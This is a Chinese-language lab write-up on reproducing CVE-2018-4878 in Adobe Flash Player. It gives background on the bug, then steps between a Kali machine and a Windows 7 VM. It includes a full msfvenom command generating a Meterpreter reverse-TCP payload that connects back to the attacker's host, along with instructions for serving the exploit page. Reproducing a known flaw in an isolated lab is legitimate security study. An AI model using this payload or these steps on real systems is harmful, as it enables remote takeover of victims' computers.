(CVE-2018-4878)Adobe Flash Player 远程代码执行漏洞
一、漏洞简介
2018年1月31日,韩国CERT发布公告称发现Flash 0day漏洞的野外利用,攻击者执行针对性的攻击;2月1日Adobe发布安全公告,确认Adobe Flash Player 28.0.0.137 及早期版本存在远程代码执行漏洞(CVE-2018-4878);2月2日,Cisco Talos团队发布了事件涉及攻击样本的简要分析;2月7日,Adobe发布了CVE-2018-4878漏洞的安全补丁。
二、漏洞影响
Adobe Flash Player \<= 28.0.0.137
三、复现过程
- 1.环境 kail:
192.168.184.128
win7sp1:192.168.184.131
exp:CVE-2018-4878-master.zip
flash:AdobeFlashPlayer28.0.0.161正式版.zip
- 2.利用msfvenom生成对应的shellcode代码
{=html}
<!-- -->
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.128 lport=4444 -f python>shellcode.txt
- 3.进入 CVE-2018-4878-master
目录,编辑
CVE-2018-4878.py
文件,将msfvenom生成的代码覆盖掉原来的代码
- 4.修改 swf 文件及 html 文件位置
- 5.Python 执行 CVE-2018-4878-master.py 代码,会生成两个文件,一个 swf 文件,一个 html 文件
- 6.把生成的两个文件放到apache web目录下
- 7.通过msf开启反弹sehll监听
- 8.靶机上win7安装存在漏洞的adobe flash player 28.0.0.126
- 9.通过win7自带的ie浏览器进行访问
192.168.184.128/index2.html
- 10.Kail上成功获取到meterpreter shell